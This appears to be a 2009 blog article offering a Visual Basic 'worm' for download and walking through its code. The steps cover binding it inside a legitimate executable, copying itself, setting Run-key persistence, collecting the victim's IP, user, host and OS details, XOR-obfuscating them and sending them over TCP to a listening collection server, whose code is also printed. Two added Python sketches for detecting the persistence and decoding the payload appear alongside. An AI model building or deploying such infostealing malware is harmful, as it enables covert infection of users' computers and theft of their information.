Bilbao Digital

Asociación para la Cualificación y el Aprendizaje Permanente


My.worm (Visual Basic)


Now that Vista is leaving and people are willing to install Seven hoping UAC is no longer there, I'm sure that Windows users will always get what they want: usability and insecurity. Many, many people make money thanks to Windows XP's insecurity: regular users saving a lot of time, and malicious users infecting the former. A great scenario that keeps the money moving.

Here is an example of this business: a computer worm. Yes, this can be used to harm computers, spread payloads, disclose information... and for educational purposes.

Risk disclaimer: (Please read very carefully)

No guarantees are made for the currency or accuracy of the information. bilbaodigital.es's information is provided "as is", without warranty of any kind, whether expressed or implied. bilbaodigital.es and its authors make no guarantee and hold no responsibility for any damage, injury, loss of property, loss of data, loss of any and all resources, or any negative influence whatsoever, that may result from any and all usage of the information found on bilbaodigital.es, or linked from bilbaodigital.es (including but not limited to bilbaodigital.es's articles). This includes but is not limited to downloadable software on bilbaodigital.es.

Negative consequences of your usage of the bilbaodigital.es website are solely your problem and your responsibility. All consequences of the usage of bilbaodigital.es do not involve bilbaodigital.es and its authors, at all, ever. You hold full responsibility for your actions.

Use bilbaodigital.es's information resources at your own risk.

Download Worm (replicates, modifies registry, encrypts and sends information) - md5 hash 5479efa37350f2c63dfd874e450fdc3f - virustotal.com results
Download Server (listens, waits for myworm.exe transmission and decrypts data) - md5 hash 6ae27d05ce325fdfb6da310b4b219c4b - virustotal.com results
15/12/2009

These five steps have been considered while developing this Visual Basic worm code.

1. In a layer 8 error, a user executes the malicious file.
This is the first step from the victim's point of view but the last one for developers. Iexpress.exe is a Windows tool that can be used to bind/join two executables and automatically run the programs contained inside. You can distribute any exe (myworm.exe) within a well-known application (notepad.exe). Self-explanatory.

2. Once done, it replicates. Self-copy to other filesystems.
Now the code must guarantee survival by copying itself to another location with different names/properties:

Dim nombre_archivo As String = System.IO.Path.GetFileName(Process.GetCurrentProcess().MainModule.FileName)
Dim archivo_origen As String = Process.GetCurrentProcess().MainModule.FileName
Dim archivo_destino As String = "C:\" + nombre_archivo

    Private Sub copia()
        If System.IO.File.Exists(archivo_destino) = False Then
            System.IO.File.Copy(archivo_origen, archivo_destino)
            MsgBox("File copied")
        End If
    End Sub

3. Runs on startup, grants access via OS registry.
To execute the code on computer startup we can modify the registry:

Dim key As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)

    Private Sub registro()
        If key.GetValue(nombre_archivo) = "" Then
            key.SetValue(nombre_archivo, "C:\myworm.EXE")
            MsgBox("Registry added")
        End If
    End Sub
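For defenders, the persistence in step 3 leaves a recognisable artefact: a Run value named after the executable, whose data points at a file in the drive root. The following Python sketch is an added example (not part of the original article) that parses constructed `reg query` output and flags such values; the sample entries and the two heuristics are assumptions chosen to match the code above.

```python
"""Flag HKCU Run values that look like the persistence described in step 3."""
import ntpath
import re

# Constructed sample in the layout printed by `reg query <key>`.
SAMPLE_REG_QUERY = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    myworm.exe    REG_SZ    C:\myworm.EXE
    Updater    REG_SZ    C:\Program Files\Vendor\updater.exe
'''

VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")


def target_path(data):
    """Extract the executable path from a Run value, dropping any arguments."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    match = re.match(r"(?i)(.+?\.exe)\b", data)
    return match.group(1) if match else data


def audit_run_values(reg_query_text):
    """Return (value name, path, reasons) for every suspicious Run value."""
    findings = []
    for line in reg_query_text.splitlines():
        match = VALUE_LINE.match(line)
        if not match:
            continue  # key header or blank line
        name, path = match["name"], target_path(match["data"])
        folder, filename = ntpath.split(path)
        reasons = []
        # Heuristic 1 (assumption): autostart executable sitting in a drive root.
        if re.fullmatch(r"[A-Za-z]:\\", folder) and filename.lower().endswith(".exe"):
            reasons.append("executable in drive root")
        # Heuristic 2 (assumption): value name is the file name itself.
        if name.lower() == filename.lower():
            reasons.append("value name equals file name")
        if reasons:
            findings.append((name, path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit_run_values(SAMPLE_REG_QUERY):
        print(f"{name} -> {path}: {', '.join(reasons)}")
```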

4. Gathers information about users, computers and networks.
Now you can read any file from the computer or obtain information provided by the programming language, for example:

  • Public IP

        Dim plaindata As String
        Function whatismyip()
            Dim uri As New Uri("http://www.whatismyip.org/")
            Dim request As WebRequest = WebRequest.Create(uri)
            Dim response As WebResponse = request.GetResponse()
            Dim stream As Stream = response.GetResponseStream()
            Dim reader As New StreamReader(stream)
            Dim myIP As String = reader.ReadToEnd()
            reader.Close()
            stream.Close()
            Return myIP
        End Function
        plaindata = ("IP Pública: " + whatismyip())

  • User name

        plaindata = plaindata + (" Nombre equipo/usuario: " + Environment.UserDomainName + "/" + Environment.UserName)

  • Computer name

        plaindata = plaindata + (" Información del equipo: " + Dns.GetHostName)

  • OS version

        plaindata = plaindata + (" SO/Versión: " + My.Computer.Info.OSFullName + "/" + My.Computer.Info.OSVersion)

  • Language and country code

        plaindata = plaindata + (" Idioma/Código: " + My.Computer.Info.InstalledUICulture.DisplayName + "/" + My.Computer.Info.InstalledUICulture.Name)

  • Time

        plaindata = plaindata + (" Hora: " + My.Computer.Clock.LocalTime)

5. Sends this information encrypted to a specific host/port using a TCP client-server architecture.
We can encrypt this information before sending it to another host with a simple XOR translation.

        Function XorString(ByVal targetString As String, ByVal maskValue As String) As String
            Dim Index As Integer = 0
            Dim ReturnValue As String = ""
            For Each CharValue As Char In targetString.ToCharArray
                ReturnValue = String.Concat(ReturnValue, Chr(Asc(CharValue) Xor Asc(maskValue.Substring(Index, 1))))
                Index = (Index + 1) Mod maskValue.Length
            Next
            Return ReturnValue
        End Function
    
    Dim encrypteddata = XorString(plaindata, "01010101")
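
A repeating-mask XOR like this is obfuscation rather than encryption: the field labels are known plaintext, so an analyst can recover the mask from a captured payload. The Python example below is added here (it is not the article's code); the captured bytes are constructed from the article's labels with placeholder values, and it assumes the payload decodes as UTF-8, as the client sends it.

```python
"""Recover a repeating XOR mask from a captured payload via known plaintext."""

KNOWN_PREFIX = "IP Pública: "  # first field label written by the article's code


def xor_text(text, mask):
    """Character-wise XOR with a repeating mask (same scheme as XorString).
    Assumption: every character has a code point below 256 (Latin-1 range)."""
    return "".join(chr(ord(c) ^ ord(mask[i % len(mask)])) for i, c in enumerate(text))


def recover_mask(cipher, known_prefix=KNOWN_PREFIX):
    """XOR ciphertext with the known plaintext to expose the keystream,
    then return the shortest unit that repeats across it."""
    n = min(len(cipher), len(known_prefix))
    stream = xor_text(cipher[:n], known_prefix[:n])  # element-wise: keystream
    for period in range(1, n + 1):
        if all(stream[i] == stream[i % period] for i in range(n)):
            return stream[:period]
    return stream


def decode_capture(wire):
    """Return (mask, plaintext) for one captured payload."""
    cipher = wire.decode("utf-8")
    mask = recover_mask(cipher)
    return mask, xor_text(cipher, mask)


# Constructed capture: the article's labels and mask, placeholder values.
_PLAIN = "IP Pública: 203.0.113.7 Nombre equipo/usuario: LAB/analyst"
SAMPLE_WIRE = xor_text(_PLAIN, "01010101").encode("utf-8")

if __name__ == "__main__":
    mask, text = decode_capture(SAMPLE_WIRE)
    print(f"mask={mask!r}")
    print(text)
```

The recovered mask is the shortest repeating unit, which decodes the payload identically to the full eight-character string.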
    
Now this information can be transferred to a specific port using a TCP client-server architecture.
Client:
    Sub TCPClient()
            Dim tcpClient As New System.Net.Sockets.TcpClient
            Try
                tcpClient.Connect("Localhost", 2009)
            Catch e As Exception
                Console.WriteLine(e.ToString())
                Console.ReadLine()
            End Try
            Dim networkStream As NetworkStream = tcpClient.GetStream()
            If networkStream.CanWrite And networkStream.CanRead Then
                ' Do a simple write.
                Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(infocrypted)
                networkStream.Write(sendBytes, 0, sendBytes.Length)
                ' Read the NetworkStream into a byte buffer.
                Dim bytes(tcpClient.ReceiveBufferSize) As Byte
                networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                ' Output the data received from the host to the console.
                Dim returndata As String = Encoding.UTF8.GetString(bytes)
                Console.WriteLine("El servidor TCP devuelve: " + returndata.TrimEnd(" "))
            Else
                If Not networkStream.CanRead Then
                    Console.WriteLine("Could not write data to data stream")
                    tcpClient.Close()
                Else
                    If Not networkStream.CanWrite Then
                        Console.WriteLine("Could not read data from data stream")
                        tcpClient.Close()
                    End If
                End If
            End If
            ' Pause to let the user view the console output.
            Console.ReadLine()
    End Sub
    
    Multithread server:
       'DnsPermissionAttribute specifies permission to request information from Domain Name Servers.
         Class CTestTCPServer
            Shared Sub Main()
                Const portNumber As Integer = 2009
                Dim tcpListener As New TcpListener(portNumber)
                tcpListener.Start()
                Console.WriteLine("Esperando conexiones de clientes TCP...")
                While (True)
                    Try
                        'Accept the pending client connection and return a TcpClient for communication. 
                        Dim tcpClient As TcpClient = tcpListener.AcceptTcpClient()
                        Console.WriteLine("Conexión aceptada.-------------------")
                        ' Get the data stream.
                        Dim networkStream As NetworkStream = tcpClient.GetStream()
                        ' Read the data stream into a byte array.
                        Dim bytes(tcpClient.ReceiveBufferSize) As Byte
                        networkStream.Read(bytes, 0, CInt(tcpClient.ReceiveBufferSize))
                        ' Return the data received from the client to the console.
                        Dim clientdata As String = Encoding.UTF8.GetString(bytes)
                        Dim clientdataplain As String = XorString(clientdata, "01010101")
                        Console.WriteLine("El cliente ha enviado: " + clientdataplain.TrimEnd("1", "0"))
                        Dim responseString As String = "Correctamente conectado al servidor TCP."
                        Dim sendBytes As [Byte]() = Encoding.UTF8.GetBytes(responseString)
                        networkStream.Write(sendBytes, 0, sendBytes.Length)
                        Console.WriteLine(("Mensaje enviado por el servidor TCP: " + responseString))
                        'Close TcpClient.
                        tcpClient.Close()
                    Catch e As Exception
                        Console.WriteLine(e.ToString())
                        Console.ReadLine()
                    End Try
                End While
            End Sub
    
    
